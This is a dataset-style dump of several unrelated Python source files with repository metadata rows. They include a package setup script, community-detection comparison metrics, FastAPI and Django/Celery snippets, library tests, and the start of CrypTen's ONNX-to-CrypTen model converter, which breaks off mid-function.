b0367e09d7fa1a096580d762db6fd948e04c1d9e
|
[
"MIT"
] | null | null | null |
setup.py
|
bryan-he/closek
|
b0367e09d7fa1a096580d762db6fd948e04c1d9e
|
[
"MIT"
] | null | null | null |
setup.py
|
bryan-he/closek
|
b0367e09d7fa1a096580d762db6fd948e04c1d9e
|
[
"MIT"
] | null | null | null |
"""Metadata for package to allow installation with pip."""
import setuptools
exec(open("closek/version.py").read())
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="closek",
description="Scikit-learn-style implementation of the close-k classifier.",
long_description=long_description,
long_description_content_type="text/markdown",
author="Bryan He",
author_email="bryanhe@stanford.edu",
url="https://github.com/bryan-he/close-k",
version=__version__,
packages=setuptools.find_packages(),
install_requires=[
"torch",
"numpy",
"sklearn",
],
tests_require=[
"pmlb",
],
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
]
)
| 24.878788
| 79
| 0.6419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 351
| 0.427527
|
3beed423b84aed994aacbe9098f28892995cd210
| 491
|
py
|
Python
|
ramda/memoize_with_test.py
|
jakobkolb/ramda.py
|
982b2172f4bb95b9a5b09eff8077362d6f2f0920
|
[
"MIT"
] | 56
|
2018-08-06T08:44:58.000Z
|
2022-03-17T09:49:03.000Z
|
ramda/memoize_with_test.py
|
jakobkolb/ramda.py
|
982b2172f4bb95b9a5b09eff8077362d6f2f0920
|
[
"MIT"
] | 28
|
2019-06-17T11:09:52.000Z
|
2022-02-18T16:59:21.000Z
|
ramda/memoize_with_test.py
|
jakobkolb/ramda.py
|
982b2172f4bb95b9a5b09eff8077362d6f2f0920
|
[
"MIT"
] | 5
|
2019-09-18T09:24:38.000Z
|
2021-07-21T08:40:23.000Z
|
from ramda.memoize_with import memoize_with
from ramda.product import product
from ramda.private.asserts import assert_equal as e
count = 0
def memoize_with_test():
@memoize_with(lambda x: -x)
def factorial(n):
global count
count += 1
return product(range(1, n + 1))
e(factorial(5), 120)
e(factorial(5), 120)
e(factorial(5), 120)
e(factorial(4), 24)
e(factorial(4), 24)
e(factorial(4), 24)
e(factorial(4), 24)
e(count, 2)
| 20.458333
| 51
| 0.631365
| 0
| 0
| 0
| 0
| 129
| 0.262729
| 0
| 0
| 0
| 0
|
3beefe8b0cd9218be467b3453fa033b4d6ace79a
| 18,821
|
py
|
Python
|
cdlib/evaluation/comparison.py
|
xing-lab-pitt/cdlib
|
590e145429cda1db4d3671c994c502bedd77f108
|
[
"BSD-2-Clause"
] | 248
|
2019-02-17T05:31:22.000Z
|
2022-03-30T04:57:20.000Z
|
cdlib/evaluation/comparison.py
|
xing-lab-pitt/cdlib
|
590e145429cda1db4d3671c994c502bedd77f108
|
[
"BSD-2-Clause"
] | 130
|
2019-02-10T19:35:55.000Z
|
2022-03-31T10:58:39.000Z
|
cdlib/evaluation/comparison.py
|
xing-lab-pitt/cdlib
|
590e145429cda1db4d3671c994c502bedd77f108
|
[
"BSD-2-Clause"
] | 70
|
2019-02-15T19:04:29.000Z
|
2022-03-27T12:58:50.000Z
|
import numpy as np
from cdlib.evaluation.internal import onmi
from cdlib.evaluation.internal.omega import Omega
from nf1 import NF1
from collections import namedtuple, defaultdict
__all__ = [
"MatchingResult",
"normalized_mutual_information",
"overlapping_normalized_mutual_information_LFK",
"overlapping_normalized_mutual_information_MGH",
"omega",
"f1",
"nf1",
"adjusted_rand_index",
"adjusted_mutual_information",
"variation_of_information",
"partition_closeness_simple",
]
# MatchingResult = namedtuple("MatchingResult", ['mean', 'std'])
MatchingResult = namedtuple("MatchingResult", "score std")
MatchingResult.__new__.__defaults__ = (None,) * len(MatchingResult._fields)
def __check_partition_coverage(first_partition: object, second_partition: object):
nodes_first = {
node: None for community in first_partition.communities for node in community
}
nodes_second = {
node: None for community in second_partition.communities for node in community
}
if len(set(nodes_first.keys()) ^ set(nodes_second.keys())) != 0:
raise ValueError("Both partitions should cover the same node set")
def __check_partition_overlap(first_partition: object, second_partition: object):
if first_partition.overlap or second_partition.overlap:
raise ValueError("Not defined for overlapping partitions")
def normalized_mutual_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""
Normalized Mutual Information between two clusterings.
Normalized Mutual Information (NMI) is an normalization of the Mutual
Information (MI) score to scale the results between 0 (no mutual
information) and 1 (perfect correlation). In this function, mutual
information is normalized by ``sqrt(H(labels_true) * H(labels_pred))``
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.normalized_mutual_information(louvain_communities,leiden_communities)
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import normalized_mutual_info_score
return MatchingResult(
score=normalized_mutual_info_score(first_partition_c, second_partition_c)
)
def overlapping_normalized_mutual_information_LFK(
first_partition: object, second_partition: object
) -> MatchingResult:
"""
Overlapping Normalized Mutual Information between two clusterings.
Extension of the Normalized Mutual Information (NMI) score to cope with overlapping partitions.
This is the version proposed by Lancichinetti et al. (1)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.overlapping_normalized_mutual_information_LFK(louvain_communities,leiden_communities)
:Reference:
1. Lancichinetti, A., Fortunato, S., & Kertesz, J. (2009). Detecting the overlapping and hierarchical community structure in complex networks. New Journal of Physics, 11(3), 033015.
"""
return MatchingResult(
score=onmi.onmi(
[set(x) for x in first_partition.communities],
[set(x) for x in second_partition.communities],
)
)
def overlapping_normalized_mutual_information_MGH(
first_partition: object, second_partition: object, normalization: str = "max"
) -> MatchingResult:
"""
Overlapping Normalized Mutual Information between two clusterings.
Extension of the Normalized Mutual Information (NMI) score to cope with overlapping partitions.
This is the version proposed by McDaid et al. using a different normalization than the original LFR one. See ref.
for more details.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:param normalization: one of "max" or "LFK". Default "max" (corresponds to the main method described in the article)
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.overlapping_normalized_mutual_information_MGH(louvain_communities,leiden_communities)
:Reference:
1. McDaid, A. F., Greene, D., & Hurley, N. (2011). Normalized mutual information to evaluate overlapping community finding algorithms. arXiv preprint arXiv:1110.2515. Chicago
"""
if normalization == "max":
variant = "MGH"
elif normalization == "LFK":
variant = "MGH_LFK"
else:
raise ValueError(
"Wrong 'normalization' value. Please specify one among [max, LFK]."
)
return MatchingResult(
score=onmi.onmi(
[set(x) for x in first_partition.communities],
[set(x) for x in second_partition.communities],
variant=variant,
)
)
def omega(first_partition: object, second_partition: object) -> MatchingResult:
"""
Index of resemblance for overlapping, complete coverage, network clusterings.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.omega(louvain_communities,leiden_communities)
:Reference:
1. Gabriel Murray, Giuseppe Carenini, and Raymond Ng. 2012. `Using the omega index for evaluating abstractive algorithms detection. <https://pdfs.semanticscholar.org/59d6/5d5aa09d789408fd9fd3c009a1b070ff5859.pdf/>`_ In Proceedings of Workshop on Evaluation Metrics and System Comparison for Automatic Summarization. Association for Computational Linguistics, Stroudsburg, PA, USA, 10-18.
"""
__check_partition_coverage(first_partition, second_partition)
first_partition = {k: v for k, v in enumerate(first_partition.communities)}
second_partition = {k: v for k, v in enumerate(second_partition.communities)}
om_idx = Omega(first_partition, second_partition)
return MatchingResult(score=om_idx.omega_score)
def f1(first_partition: object, second_partition: object) -> MatchingResult:
"""
Compute the average F1 score of the optimal algorithms matches among the partitions in input.
Works on overlapping/non-overlapping complete/partial coverage partitions.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.f1(louvain_communities,leiden_communities)
:Reference:
1. Rossetti, G., Pappalardo, L., & Rinzivillo, S. (2016). `A novel approach to evaluate algorithms detection internal on ground truth. <https://www.researchgate.net/publication/287204505_A_novel_approach_to_evaluate_community_detection_algorithms_on_ground_truth/>`_ In Complex Networks VII (pp. 133-144). Springer, Cham.
"""
nf = NF1(first_partition.communities, second_partition.communities)
results = nf.summary()
return MatchingResult(
score=results["details"]["F1 mean"][0], std=results["details"]["F1 std"][0]
)
def nf1(first_partition: object, second_partition: object) -> MatchingResult:
"""
Compute the Normalized F1 score of the optimal algorithms matches among the partitions in input.
Works on overlapping/non-overlapping complete/partial coverage partitions.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.nf1(louvain_communities,leiden_communities)
:Reference:
1. Rossetti, G., Pappalardo, L., & Rinzivillo, S. (2016). `A novel approach to evaluate algorithms detection internal on ground truth. <https://www.researchgate.net/publication/287204505_A_novel_approach_to_evaluate_community_detection_algorithms_on_ground_truth/>`_
2. Rossetti, G. (2017). : `RDyn: graph benchmark handling algorithms dynamics. Journal of Complex Networks. <https://academic.oup.com/comnet/article-abstract/5/6/893/3925036?redirectedFrom=PDF/>`_ 5(6), 893-912.
"""
nf = NF1(first_partition.communities, second_partition.communities)
results = nf.summary()
return MatchingResult(score=results["scores"].loc["NF1"][0])
def adjusted_rand_index(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Rand index adjusted for chance.
The Rand Index computes a similarity measure between two clusterings
by considering all pairs of samples and counting pairs that are
assigned in the same or different clusters in the predicted and
true clusterings.
The raw RI score is then "adjusted for chance" into the ARI score
using the following scheme::
ARI = (RI - Expected_RI) / (max(RI) - Expected_RI)
The adjusted Rand index is thus ensured to have a value close to
0.0 for random labeling independently of the number of clusters and
samples and exactly 1.0 when the clusterings are identical (up to
a permutation).
ARI is a symmetric measure::
adjusted_rand_index(a, b) == adjusted_rand_index(b, a)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.adjusted_rand_index(louvain_communities,leiden_communities)
:Reference:
1. Hubert, L., & Arabie, P. (1985). `Comparing partitions. <https://link.springer.com/article/10.1007/BF01908075/>`_ Journal of classification, 2(1), 193-218.
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import adjusted_rand_score
return MatchingResult(
score=adjusted_rand_score(first_partition_c, second_partition_c)
)
def adjusted_mutual_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Adjusted Mutual Information between two clusterings.
Adjusted Mutual Information (AMI) is an adjustment of the Mutual
Information (MI) score to account for chance. It accounts for the fact that
the MI is generally higher for two clusterings with a larger number of
clusters, regardless of whether there is actually more information shared.
For two clusterings :math:`U` and :math:`V`, the AMI is given as::
AMI(U, V) = [MI(U, V) - E(MI(U, V))] / [max(H(U), H(V)) - E(MI(U, V))]
This metric is independent of the absolute values of the labels:
a permutation of the class or cluster label values won't change the
score value in any way.
This metric is furthermore symmetric: switching ``label_true`` with
``label_pred`` will return the same score value. This can be useful to
measure the agreement of two independent label assignments strategies
on the same dataset when the real ground truth is not known.
Be mindful that this function is an order of magnitude slower than other
metrics, such as the Adjusted Rand Index.
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.adjusted_mutual_information(louvain_communities,leiden_communities)
:Reference:
1. Vinh, N. X., Epps, J., & Bailey, J. (2010). `Information theoretic measures for clusterings comparison: Variants, properties, normalization and correction for chance. <http://jmlr.csail.mit.edu/papers/volume11/vinh10a/vinh10a.pdf/>`_ Journal of Machine Learning Research, 11(Oct), 2837-2854.
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
first_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(first_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
second_partition_c = [
x[1]
for x in sorted(
[
(node, nid)
for nid, cluster in enumerate(second_partition.communities)
for node in cluster
],
key=lambda x: x[0],
)
]
from sklearn.metrics import adjusted_mutual_info_score
return MatchingResult(
score=adjusted_mutual_info_score(first_partition_c, second_partition_c)
)
def variation_of_information(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Variation of Information among two nodes partitions.
$$ H(p)+H(q)-2MI(p, q) $$
where MI is the mutual information, H the partition entropy and p,q are the algorithms sets
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.variation_of_information(louvain_communities,leiden_communities)
:Reference:
1. Meila, M. (2007). `Comparing clusterings - an information based distance. <https://www.sciencedirect.com/science/article/pii/S0047259X06002016/>`_ Journal of Multivariate Analysis, 98, 873-895. doi:10.1016/j.jmva.2006.11.013
"""
__check_partition_coverage(first_partition, second_partition)
__check_partition_overlap(first_partition, second_partition)
n = float(sum([len(c1) for c1 in first_partition.communities]))
sigma = 0.0
for c1 in first_partition.communities:
p = len(c1) / n
for c2 in second_partition.communities:
q = len(c2) / n
r = len(set(c1) & set(c2)) / n
if r > 0.0:
sigma += r * (np.log2(r / p) + np.log2(r / q))
return MatchingResult(score=abs(sigma))
def partition_closeness_simple(
first_partition: object, second_partition: object
) -> MatchingResult:
"""Community size density closeness.
Simple implementation that does not leverage kernel density estimator.
$$ S_G(A,B) = \frac{1}{2} \Sum_{i=1}^{r}\Sum_{j=1}^{s} min(\frac{n^a(x^a_i)}{N^a}, \frac{n^b_j(x^b_j)}{N^b}) \delta(x_i^a,x_j^b) $$
where:
$$ N^a $$ total number of communities in A of any size;
$$ x^a $$ ordered list of community sizes for A;
$$ n^a $$ multiplicity of community sizes for A.
(symmetrically for B)
:param first_partition: NodeClustering object
:param second_partition: NodeClustering object
:return: MatchingResult object
:Example:
>>> from cdlib import evaluation, algorithms
>>> g = nx.karate_club_graph()
>>> louvain_communities = algorithms.louvain(g)
>>> leiden_communities = algorithms.leiden(g)
>>> evaluation.partition_closeness_simple(louvain_communities,leiden_communities)
:Reference:
1. Dao, Vinh-Loc, Cécile Bothorel, and Philippe Lenca. "Estimating the similarity of community detection methods based on cluster size distribution." International Conference on Complex Networks and their Applications. Springer, Cham, 2018.
"""
coms_a = sorted(list(set([len(c) for c in first_partition.communities])))
freq_a = defaultdict(int)
for a in coms_a:
freq_a[a] += 1
freq_a = [freq_a[a] for a in sorted(freq_a)]
n_a = sum([coms_a[i] * freq_a[i] for i in range(0, len(coms_a))])
coms_b = sorted(list(set([len(c) for c in second_partition.communities])))
freq_b = defaultdict(int)
for b in coms_b:
freq_b[b] += 1
freq_b = [freq_b[b] for b in sorted(freq_b)]
n_b = sum([coms_b[i] * freq_b[i] for i in range(0, len(coms_b))])
closeness = 0
for i in range(0, len(coms_a)):
for j in range(0, len(coms_b)):
if coms_a[i] == coms_b[j]:
closeness += min(
(coms_a[i] * freq_a[i]) / n_a, (coms_b[j] * freq_b[j]) / n_b
)
closeness *= 0.5
return MatchingResult(score=closeness)
| 36.263969
| 391
| 0.692684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 11,522
| 0.612156
|
3bef530282cd351acc8d5d5fce296f7123e0bfe8
| 56
|
py
|
Python
|
node/views/__init__.py
|
mohamedmansor/path-detector
|
14954795ea47109d404b54f74575337f86d6134f
|
[
"MIT"
] | null | null | null |
node/views/__init__.py
|
mohamedmansor/path-detector
|
14954795ea47109d404b54f74575337f86d6134f
|
[
"MIT"
] | null | null | null |
node/views/__init__.py
|
mohamedmansor/path-detector
|
14954795ea47109d404b54f74575337f86d6134f
|
[
"MIT"
] | null | null | null |
from .node_view import ConnectNodesViewSet, PathViewSet
| 28
| 55
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3bf1bbdf44b6a8b3ce4f31f26290f905b3426047
| 1,193
|
py
|
Python
|
tests/modules/extra/fastapi/controller/integration/test_fastapi_app_with_controller.py
|
alice-biometrics/petisco
|
b96e697cc875f67a28e60b4fc0d9ed9fc646cd86
|
[
"MIT"
] | 19
|
2019-11-01T09:27:17.000Z
|
2021-12-15T10:52:31.000Z
|
tests/modules/extra/fastapi/controller/integration/test_fastapi_app_with_controller.py
|
alice-biometrics/petisco
|
b96e697cc875f67a28e60b4fc0d9ed9fc646cd86
|
[
"MIT"
] | 68
|
2020-01-15T06:55:00.000Z
|
2022-02-22T15:57:24.000Z
|
tests/modules/extra/fastapi/controller/integration/test_fastapi_app_with_controller.py
|
alice-biometrics/petisco
|
b96e697cc875f67a28e60b4fc0d9ed9fc646cd86
|
[
"MIT"
] | 2
|
2019-11-19T10:40:25.000Z
|
2019-11-28T07:12:07.000Z
|
from typing import Optional
import pytest
from fastapi import FastAPI, Header
from fastapi.testclient import TestClient
from meiga import BoolResult, Failure, isFailure, isSuccess
from petisco import NotFound, assert_http
from petisco.extra.fastapi import FastAPIController
app = FastAPI(title="test-app")
result_from_expected_behavior = {
"success": isSuccess,
"failure_generic": isFailure,
"failure_not_found": Failure(NotFound()),
}
class MyController(FastAPIController):
def execute(self, expected_behavior: str) -> BoolResult:
return result_from_expected_behavior.get(expected_behavior, isSuccess)
@app.get("/test")
def entry_point(x_behavior: Optional[str] = Header("success")):
return MyController().execute(x_behavior)
@pytest.mark.unit
@pytest.mark.parametrize(
"behavior,expected_status_code",
[("success", 200), ("failure_generic", 500), ("failure_not_found", 404)],
)
def test_fastapi_app_with_controller_should_return_expected_values(
behavior, expected_status_code
):
with TestClient(app) as client:
response = client.get("/test", headers={"x-behavior": behavior})
assert_http(response, expected_status_code)
| 29.097561
| 78
| 0.75943
| 178
| 0.149204
| 0
| 0
| 554
| 0.464376
| 0
| 0
| 166
| 0.139145
|
3bf3ea019e2b8d99252bef80157556503f118e91
| 438
|
py
|
Python
|
component/reminder/tasks.py
|
pablo0723/just-a-test
|
31e8157a5d1f50b30d83d945b77caaa2b7b717ba
|
[
"MIT"
] | null | null | null |
component/reminder/tasks.py
|
pablo0723/just-a-test
|
31e8157a5d1f50b30d83d945b77caaa2b7b717ba
|
[
"MIT"
] | null | null | null |
component/reminder/tasks.py
|
pablo0723/just-a-test
|
31e8157a5d1f50b30d83d945b77caaa2b7b717ba
|
[
"MIT"
] | null | null | null |
from django.core.mail import send_mail
from component.reminder.models import Reminder
from server.celery import app
@app.task
def send_email(id):
reminder = Reminder.objects.filter(id=id).first()
if reminder is not None:
send_mail(subject="ReminderMessage",
message=reminder.text,
from_email='no-reply@test.com',
recipient_list=[reminder.email]
)
| 27.375
| 53
| 0.636986
| 0
| 0
| 0
| 0
| 318
| 0.726027
| 0
| 0
| 36
| 0.082192
|
3bf45f24ab2dd0e2ee1d2a8a4c89e7d8442c50d9
| 1,203
|
py
|
Python
|
skmine/tests/test_base.py
|
remiadon/scikit-mine
|
769d7d5ea0dda5d4adea33236733f4ce1ea0c815
|
[
"BSD-3-Clause"
] | null | null | null |
skmine/tests/test_base.py
|
remiadon/scikit-mine
|
769d7d5ea0dda5d4adea33236733f4ce1ea0c815
|
[
"BSD-3-Clause"
] | null | null | null |
skmine/tests/test_base.py
|
remiadon/scikit-mine
|
769d7d5ea0dda5d4adea33236733f4ce1ea0c815
|
[
"BSD-3-Clause"
] | null | null | null |
import pandas as pd
import pytest
from ..base import BaseMiner, MDLOptimizer
def test_inst_params():
class MyMiner(BaseMiner):
def __init__(self, eps=3):
self.eps = eps
self._a = 2
def fit(self, D):
self._a = 12
kwargs = dict(eps=4)
miner = MyMiner(**kwargs)
assert miner.get_params() == kwargs
kwargs.update(eps=10)
miner.set_params(**kwargs)
assert miner.get_params() == kwargs
assert miner.set_params().get_params() == kwargs # stay untouched
with pytest.raises(ValueError):
miner.set_params(random_key=2)
def test_inst_params_no_init():
class MyMiner(BaseMiner):
def fit(self, D, y=None):
return self
miner = MyMiner()
assert miner.get_params() == dict()
def test_mdl_repr():
class A(MDLOptimizer):
def __init__(self):
self.codetable_ = {1: [0, 1], 2: [1]}
def fit(self):
return self
def evaluate(self):
return True
def generate_candidates(self):
return list()
a = A()
assert isinstance(a._repr_html_(), str)
assert isinstance(a.fit()._repr_html_(), str)
| 20.741379
| 70
| 0.591022
| 513
| 0.426434
| 0
| 0
| 0
| 0
| 0
| 0
| 16
| 0.0133
|
3bf5e5434eef73539dca4c83819a0c06da30de79
| 893
|
py
|
Python
|
src/season/data/websrc/modules/intro/controller/index.py
|
season-framework/season-flask-wiz
|
95d75758a6036d387c1b803bd6a68f238ec430e0
|
[
"MIT"
] | 6
|
2021-12-09T05:06:49.000Z
|
2022-01-18T02:38:03.000Z
|
src/season/data/websrc/modules/intro/controller/index.py
|
season-framework/season-flask-wiz
|
95d75758a6036d387c1b803bd6a68f238ec430e0
|
[
"MIT"
] | 2
|
2022-02-18T02:00:36.000Z
|
2022-03-22T05:18:30.000Z
|
src/season/data/websrc/modules/intro/controller/index.py
|
season-framework/season-flask-wiz
|
95d75758a6036d387c1b803bd6a68f238ec430e0
|
[
"MIT"
] | 2
|
2022-01-07T00:26:00.000Z
|
2022-03-07T06:24:27.000Z
|
import season
import random
class Controller(season.interfaces.controller.base):
def __init__(self, framework):
super().__init__(framework)
def __default__(self, framework):
return self.redirect('list')
def list(self, framework):
data = []
for i in range(20):
data.append({
'id': 'item-' + str(i+1),
'title' :'Title #{}'.format(i+1),
'value1': random.randint(0, 1000),
'value2': random.randint(0, 1000),
'value3': random.randint(0, 10000) / 100
})
return framework.response.render('list.pug', data=data)
def item(self, framework):
message = framework.model('data').getMessage()
itemid = framework.request.segment.get(0, True)
return framework.response.render('item.pug', id=itemid, message=message)
| 33.074074
| 80
| 0.571109
| 864
| 0.967525
| 0
| 0
| 0
| 0
| 0
| 0
| 85
| 0.095185
|
3bf63b37e1c270fbc81e663a1141ad00744d52eb
| 11,770
|
py
|
Python
|
crypten/nn/onnx_converter.py
|
chenfar/CrypTen
|
9a11b79f1fa9d707eb38abf7d812911980520559
|
[
"MIT"
] | null | null | null |
crypten/nn/onnx_converter.py
|
chenfar/CrypTen
|
9a11b79f1fa9d707eb38abf7d812911980520559
|
[
"MIT"
] | null | null | null |
crypten/nn/onnx_converter.py
|
chenfar/CrypTen
|
9a11b79f1fa9d707eb38abf7d812911980520559
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import copy
import io
import onnx
import torch
import torch.onnx.symbolic_helper as sym_help
import torch.onnx.symbolic_registry as sym_registry
import torch.onnx.utils
from onnx import numpy_helper
from torch.onnx import OperatorExportTypes
from . import module
try:
import tensorflow as tf # noqa
import tf2onnx
TF_AND_TF2ONNX = True
except ImportError:
TF_AND_TF2ONNX = False
def from_onnx(onnx_string_or_file):
"""
Converts an ONNX model serialized in an `onnx_string_or_file` to a CrypTen model.
"""
onnx_model = _load_onnx_model(onnx_string_or_file)
return _to_crypten(onnx_model)
def from_pytorch(pytorch_model, dummy_input):
"""
Converts a PyTorch model `pytorch_model` into a CrypTen model by tracing it
using the input `dummy_input`.
"""
# construct CrypTen model:
f = _from_pytorch_to_bytes(pytorch_model, dummy_input)
crypten_model = from_onnx(f)
f.close()
# set model architecture to export model back to pytorch model
crypten_model.pytorch_model = copy.deepcopy(pytorch_model)
# make sure training / eval setting is copied:
crypten_model.train(mode=pytorch_model.training)
return crypten_model
def from_tensorflow(tensorflow_graph_def, inputs, outputs):
"""
Function that converts Tensorflow model into CrypTen model based on
https://github.com/onnx/tensorflow-onnx/blob/master/tf2onnx/convert.py
The model is returned in evaluation mode.
Args:
`tensorflow_graph_def`: Input Tensorflow GraphDef to be converted
`inputs`: input nodes
`outputs`: output nodes
"""
raise DeprecationWarning(
"crypten.nn.from_tensorflow is deprecated. ",
"CrypTen will no longer support model conversion from TensorFlow.",
)
# Exporting model to ONNX graph
if not TF_AND_TF2ONNX:
raise ImportError("Please install both tensorflow and tf2onnx packages")
with tf.Graph().as_default() as tf_graph:
tf.import_graph_def(tensorflow_graph_def, name="")
with tf2onnx.tf_loader.tf_session(graph=tf_graph):
g = tf2onnx.tfonnx.process_tf_graph(
tf_graph,
opset=10,
continue_on_error=False,
input_names=inputs,
output_names=outputs,
)
onnx_graph = tf2onnx.optimizer.optimize_graph(g)
model_proto = onnx_graph.make_model(
"converted from {}".format(tensorflow_graph_def)
)
f = io.BytesIO()
f.write(model_proto.SerializeToString())
# construct CrypTen model
# Note: We don't convert crypten model to training mode, as Tensorflow
# models are used for both training and evaluation without the specific
# conversion of one mode to another
f.seek(0)
crypten_model = from_onnx(f)
return crypten_model
def _from_pytorch_to_bytes(pytorch_model, dummy_input):
"""
Returns I/O stream containing ONNX graph for `pytorch_model` traced with
input `dummy_input`.
"""
# first export is only used to obtain the PyTorch-to-ONNX symbolic registry:
with io.BytesIO() as f:
_export_pytorch_model(f, pytorch_model, dummy_input)
# update ONNX symbolic registry with CrypTen-specific functions:
_update_onnx_symbolic_registry()
# export again so the graph is created with CrypTen-specific registry:
f = io.BytesIO()
f = _export_pytorch_model(f, pytorch_model, dummy_input)
f.seek(0)
return f
def _export_pytorch_model(f, pytorch_model, dummy_input):
"""
Returns a binary I/O stream containing ONNX-exported pytorch_model that was
traced with input `dummy_input`.
"""
kwargs = {
"do_constant_folding": False,
"export_params": True,
"enable_onnx_checker": True,
"input_names": ["input"],
"operator_export_type": OperatorExportTypes.ONNX,
"output_names": ["output"],
}
torch.onnx.export(pytorch_model, dummy_input, f, **kwargs)
return f
# mapping from ONNX to crypten.nn for modules with different names:
ONNX_TO_CRYPTEN = {
"adaptive_avg_pool2d": module.AdaptiveAvgPool2d,
"adaptive_max_pool2d": module.AdaptiveMaxPool2d,
"AveragePool": module.AvgPool2d,
"Clip": module.Hardtanh,
"MaxPool": module.MaxPool2d,
"Pad": module._ConstantPad,
"Relu": module.ReLU,
"ReduceMean": module.Mean,
"ReduceSum": module.Sum,
}
def _to_crypten(onnx_model):
"""
Function that converts an `onnx_model` to a CrypTen model.
"""
# create graph:
input_names, output_names = _get_input_output_names(onnx_model)
assert len(output_names) == 1, "Only one output per model supported."
crypten_model = module.Graph(input_names, output_names[0])
# create nodes for the parameters:
for node in onnx_model.graph.initializer:
param = torch.from_numpy(numpy_helper.to_array(node))
crypten_model.add_module(node.name, module.Parameter(param), [])
# loop over all nodes:
for node in onnx_model.graph.node:
# get attributes and node type:
attributes = {attr.name: _get_attribute_value(attr) for attr in node.attribute}
crypten_class = _get_operator_class(node.op_type, attributes)
# add CrypTen module to graph:
crypten_module = crypten_class.from_onnx(attributes=attributes)
input_names = list(node.input)
output_names = list(node.output)
if node.op_type == "Dropout":
output_names = [output_names[0]] # do not output Dropout mask
crypten_model.add_module(
output_names[0], crypten_module, input_names, output_names=output_names
)
# return final model:
crypten_model = _get_model_or_module(crypten_model)
return crypten_model
def _load_onnx_model(onnx_string_or_file):
"""
Loads ONNX model from file or string.
"""
if hasattr(onnx_string_or_file, "seek"):
onnx_string_or_file.seek(0)
return onnx.load(onnx_string_or_file)
return onnx.load_model_from_string(onnx_string_or_file)
def _get_input_output_names(onnx_model):
"""
Return input and output names of the ONNX graph.
"""
input_names = [input.name for input in onnx_model.graph.input]
output_names = [output.name for output in onnx_model.graph.output]
assert len(input_names) >= 1, "number of inputs should be at least 1"
assert len(output_names) == 1, "number of outputs should be 1"
return input_names, output_names
def _get_model_or_module(crypten_model):
"""
Returns `Module` if model contains only one module. Otherwise returns model.
"""
num_modules = len(list(crypten_model.modules()))
if num_modules == 1:
for crypten_module in crypten_model.modules():
return crypten_module
return crypten_model
def _get_attribute_value(attr):
"""
Retrieves value from an ONNX attribute.
"""
if attr.HasField("f"): # floating-point attribute
return attr.f
elif attr.HasField("i"): # integer attribute
return attr.i
elif attr.HasField("s"): # string attribute
return attr.s # TODO: Sanitize string.
elif attr.HasField("t"): # tensor attribute
return torch.from_numpy(numpy_helper.to_array(attr.t))
